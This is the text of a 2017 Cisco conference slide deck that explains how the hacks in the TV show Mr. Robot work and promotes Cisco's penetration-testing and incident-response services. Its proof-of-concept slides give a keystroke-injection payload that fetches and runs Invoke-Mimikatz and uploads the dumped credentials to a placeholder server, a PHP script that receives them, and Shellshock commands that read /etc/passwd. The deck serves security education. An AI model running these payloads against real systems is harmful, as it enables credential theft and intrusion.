Cisco Connect Toronto 2017 - Security Through The Eyes of a Hacker

Vince Kornacki, Senior Security Consultant, Cisco
Sean Mason, Director of Incident Response, Cisco
October 12, 2017
Exploring the Anatomy of a Cyber-Attack
Security Through the Eyes of a Hacker

© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Hollywood’s Depiction of Hacking
“I dropped a logic bomb through the trap door.”
-Swordfish
“A gigabyte of RAM should do the trick”
-Under Siege 2
“I’ll create a GUI interface using Visual
Basic, see if I can track an IP address.”
-CSI
“Isolate the node and dump it on the
other side of the router.”
-NCIS

© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
The award for Hollywood’s best
attempt at depicting hacking goes to…

© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Elliot Hacks Steel Mountain Thermostat

© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
How’d He Do It?
•Social Engineers his way inside the building
•Splice Raspberry Pi into theBACnet (Building Automation and Control
Network) network lines connected to the thermostat

© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
How’d He Do It?

© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Angela Hacks Her Boss’ Evil Corp Credentials

© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
How’d She Do It?
Rubber Ducky USB
•Keystroke injection attack tool
Invoke-Mimikatz
•Script that reflectively injects Mimikatz into memory using Powershell

© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Proof of Concept
1.Write the Payload
•Open administrator command prompt
DELAY 1000
GUI r
STRING powershellStart-Processcmd–VerbrunAs
ENTER
DELAY 2000
ALT y
DELAY 1000
•Obfuscate command prompt
STRING mode con:cols=18 lines=1
ENTER
STRING color FE
ENTER

© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Proof of Concept
1.Write the Payload (continued)
•Download and execute “Invoke-Mimikatz” script then upload the results
STRING powershell"IEX (New-Object Net.WebClient).DownloadString(MimikatzScriptURL:’);
$output = Invoke-Mimikatz-DumpCreds;
(New-Object Net.WebClient).UploadString(‘PHP_Creds_Receiver_URL’,$output)”
ENTER
DELAY 15000
•Clear the Run history and exit
STRING powershell"Remove-ItemProperty-Path ’PathToRunMRU'
-Name '*' -ErrorActionSilentlyContinue"
ENTER
STRING exit
ENTER

© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Proof of Concept
2. Encode the Payload
java -jar duckencode.jar-iinvoke-mimikatz.txt-o inject.bin
3.Set up Web Server
<?php$file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds";
file_put_contents($file, file_get_contents("php://input")); ?>

© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Proof of Concept
4.Deploy Attack

© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Elliot Hacks the Prison

© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Spoofing a Bluetooth Connection

© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
How’d He Do It?
1. Enable Bluetooth 2. Scan for Bluetooth Devices

© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
How’d He Do It?
3. Spoof the MAC Address of the Keyboard
4. Link Bluetooth Device to the Cop’s Laptop
5. Hack the Prison

© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Elliot Hacks Tyrell’s Email Account

© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
How’d He Do It?
wget–U “() test;];echo \”Content-type: text/plain\”; echo; echo; /bin/cat
/etc/passwd” http://evilcorp-intl.com/login.email.srf?wa=wsignin1.0&rpsnv=4d
1. Exploit Shellshock vulnerability using wget
2. Use John the Ripper on /etc/passwd(Elliot should have used /etc/shadow)
./john /etc/passwd

© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Simple Attack That Works
GET / HTTP/1.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8,fr;q=0.6
Cache-Control: no-cache Pragma: no-cache
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/37.0.2062.124 Safari/537.36
Host: example.com
Edit “User-Agent” Header to look like “HTTP_USER_AGENT=() { :; }; /bin/eject”

© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Darlene Phishes Evil Corp

© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Phishing Website Proof of Concept
1. Start Up The Social Engineer Toolkit (SET)

© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Phishing Website Proof of Concept
2. Choose Attack Method

© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Phishing Website Proof of Concept
3. Configure Attacker’s Website and Kali Box

© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Phishing Website Proof of Concept
3. Configure Website and Kali Box (continued)

© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Phishing Website Proof of Concept
4. Create Website and Start Server

© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Phishing Website Proof of Concept
5. Victim Visits Phishing Site

© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Phishing Website Proof of Concept
6. Victim Is Owned

© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Cisco Consultants Use These Tools and Techniques
Application & Penetration Team Services
•External Network Penetration Test Exploit software vulnerabilities such as
Shellshock
•Internal Network Penetration Test Use post-exploitation tools like “Mimikatz”
and “John the Ripper” to compromise authentication credentials
•IoT Security AssessmentManipulate IoT protocols like BACnet using a
Raspberry Pi
•Social Engineering Assessment Launch phishing attacks using tools like the
Social Engineer Toolkit (SET)

© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Penetration Testing Methodology

© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Cisco Incident Response Goes To Hollywood

© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Security Advisory Services
Incident Response
Security Strategy and Architecture
Compliance
Privacy and Risk Management
Security Assessments and Penetration
Network and Infrastructure
Application and System
Physical
Benefits
Higher confidence in what is actually
happening in your network, including
greater visibility and deeper
understanding of your operations and
infrastructure
Identify security gaps, ineffective
operational processes and poorly
designed technology security controls

© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Cisco Incident Response Services
A Holistic Portfolio for Your Organizations Needs
Proactive
Threat Hunting
Am I currently
compromised?
Emergency
Incident Response
I need help right
now.
IR
Tabletop Exercises
I need to know
we will respond
correctly.
Incident Response
Retainers
I want to know I
have a team
standing by.
IR Plans &
Playbooks
Am I missing
anything needed
to respond?
Included in IR Retainers
IR Readiness
Assessments
I need a plan for
when an incident
occurs.

300+
Full Time Threat
Intel Researchers
1100+ Threat Traps
Threat Intel
1.5 Million
Daily Malware
Samples
600 Billion
Daily Email
Messages
16 Billion
Daily Web
Requests
Honeypots
Open Source
Communities
Vulnerability
Discovery (Internal)
Product
Telemetry
Internet-Wide
Scanning
Customer Data
Sharing
Programs
Service Provider
Coordination
Program
Open
Source
Intel
Sharing
3
rd
Party Programs
(MAPP)
Industry
Sharing
Partnerships
(ISACs)
Intel Breakdown
20 Billion
Threats Blocked
Intel Sharing
500+
Participants
Millions
Of Telemetry
Agents
4
Global Data
Centers
100+
Threat Intelligence
Partners

© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Malware outbreaks
Top things we are seeing
1
2
3
4
Data Exfiltration
Ransomware
Insiders

© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Nyetya: Helping Customers Respond Quickly
Immediate Access
to named
Responders
Urgent Notification
with unpublished
details
IR onsite in Ukraine
working with Talos
Threat Researchers
Quick Access
to Incident Responders
and Intelligence
Emergency
Customers
Emergency
Bulletin
Source
M.E. Doc
Retainer
Customers

© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Kill Chain (KC)
“Intelligence-Driven Computer Network Defense Informed by Analysis of
Adversary Campaigns and Intrusion Kill Chains”, Lockheed Martin
bit.ly/killchain
KC1-Reconnaissance:
Collecting information about the
target organization
KC2-Weaponization: Packaging
the threat for delivery
KC3-Delivery: Transmission of the
weaponized payload
KC4-Exploitation: Exploiting
vulnerabilities on a system
KC5-Installation: Installing
malware on a target
KC6-Command & Control:
Providing “hands on the keyboard”
access to the target system
KC7-Actions on Intent: The
attacker achieves their objective
(e.g. stealing information)
Recon
Weapon-
ization
Delivery
Exploitation
Installation
C2
Actions on
Intent

© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
CUSTOMER
CASE STUDY
Organization’s testing/development
network environment targeted, which
lacked security controls and monitoring.
Attackers maintained persistence in the
environment for 5+ months.
C2 malware with zero A/V detection rate,
which was utilized for persistence into
environment.
Deployed StealthWatch into existing
infrastructure.
Deployed AMP for Endpoints to facilitate
endpoint, network analysis, and
remediation.
Malware reverse engineering, memory
forensics, & disk forensics performed on
affected hosts.
App Pen Testing group conducted
application hardening post-incident
response.
ResponseIncident
Telecommunications
Escalated to Cisco IR after law enforcement
notification
Targeted attack by nation state
actor.
Intelligence
Outcomes
Cisco StealthWatch deployment provided
enhanced visibility into infrastructure,
which identified additional security gaps.
Umbrella Investigate utilized for
monitoring primary C2 server.
Cisco provided SME’s to assist in
response efforts to identify, contain,
and eradicate the malware.
Cisco utilized proven hunt methodologies
and techniques for an advanced adversary
in a large environment, while performing
forensic methodologies for root cause
analysis.
People Process Technology
Revenue
: $3B+
Employees:
100k+

© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Dynamic Threats
Objective
Example
Skill
Potential
Data
Targets
Named
Actors
State
Sponsored/APT
Economic, Political
Advantage, Destruction
Intellectual Property
Theft, DDOS
Very High
Intellectual Property,
Negotiation,
National Intelligence
APT1, Energetic
Bear
Cyber
Crime
Financial
Gain
Credit Card Theft
High
Credit Card Data,
Personal
Identifiable
Information, Health
Records
Russian Business
Network (RBN)
Hacktivism
Defamation,
Destruction, Press &
Policy
Website
Defacements, DDOS
Low -Med
Access to the Network,
Compromising
Information
Syrian Electronic Army,
LizardSquad,
Anonymous
Nuisance
Access &
Propagation
Botnets & Spam
Low
Sensitive
Information,
Vulnerable Data
General Malware
Revenge, Destruction,
Monetary Gain
Insiders
Destruction,
Theft
Med
Intellectual
Property,
Compromising
Information
Jimmy, Suzy, Sally,
Johnny

© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Anatomy of the Attack
•Collecting information about the
organization
•Port Scan (e.g. Nmap)
•Network Logon from Local
Administrator Account
Reconnaissance
Internet
Gb Router
ISP Cable
Modem
Win10 Hyper V

© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Anatomy of the Attack
Typically, we don’t see KC2;
however malware analysis of
“C2malware.exe” provided some
insight into payload/ capabilities.
Weaponization
00-00-00-AA-AB-AB |
192.168.1.1 | HostName |
Administrator | C2Domain.com |
AcmeIncResearch
Internet
Gb Router
ISP Cable
Modem
Win10 Hyper V

© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Anatomy of the Attack
•Network Logon from
Administrator Account
•No password required
•Transmission of C2malware.exe
•Attacker(s) choice
•No Firewall
•No A/V
Delivery
Internet
Gb Router
ISP Cable
Modem
Win10 Hyper V

© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Anatomy of the Attack
•Exploitation? None required
•No firewall
•No password required
Exploitation
Internet
Gb Router
ISP Cable
Modem
Win10 Hyper V

© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Anatomy of the Attack
•Install C2malware.exe on target
machine
Installation
01/01/2017 00:02:00 UTC
C:\Windows\system32\C2malware.exe
01/01/2017 00:00:30 UTC
C:\Users\Attacker\C2malware.exe
Internet
Gb Router
ISP Cable
Modem
Win10 Hyper V

© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Anatomy of the Attack
•C:\Windows\system32\C2malwa
re.exe
•Persistence via \Run Key
•Beacons out over port 80 to C2
node
Command and
Control (C2)

© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Anatomy of the Attack
•Remote backdoor via
C2malware.exe with the
following capabilities:
•Remote Shell
•Read/Write/Execute File(s)
•Create Tasks
•List Drives
Actions on
Objectives
Internet
Gb Router
ISP Cable
Modem
Win10 Hyper V

© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Ransomware
http://www.welivesecurity.com/2017/01/05/killdisk-
now-targeting-linux-demands-250k-ransom-cant-
decrypt/
http://blog.talosintel.com/2016/07/ranscam.html

© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Doxware
•First started seeing this over a year ago
•Becoming more mainstream
•New frontier of ransomware
•Data Exfiltration
•Encryption of Data
•Extortion
•Data leakage

© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Public
Resources
Cisco Incident Response Team
If you are currently experiencing an incident, please
contact us at: 1-844-831-7715
Or email [email protected]
Cisco Security
Services: https://cisco.com/go/securityservices
Blogs: https://blogs.cisco.com

Cisco Connect Toronto 2017 - Security Through The Eyes of a Hacker

About This Presentation

Slide Content

Tags

Categories

Download

Quick Actions

Statistics

Related Slideshows

Cisco Connect Toronto 2017 - Security Through The Eyes of a Hacker

About This Presentation

Slide Content

Slide 1

Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14

Slide 15

Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32

Slide 33

Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Slide 39

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Tags

Categories

Download

Quick Actions

Statistics

Related Slideshows

Pray For The Peace Of Jerusalem and You Will Prosper

Don_t_Waste_Your_Life_God.....powerpoint

VILLASUR_FACTORS_TO_CONSIDER_IN_PLATING_SALAD_10-13.pdf

Fertility awareness methods for women in the society

Chapter 5 Arithmetic Functions Computer Organisation and Architecture

syakira bhasa inggris (1) (1).pptx.......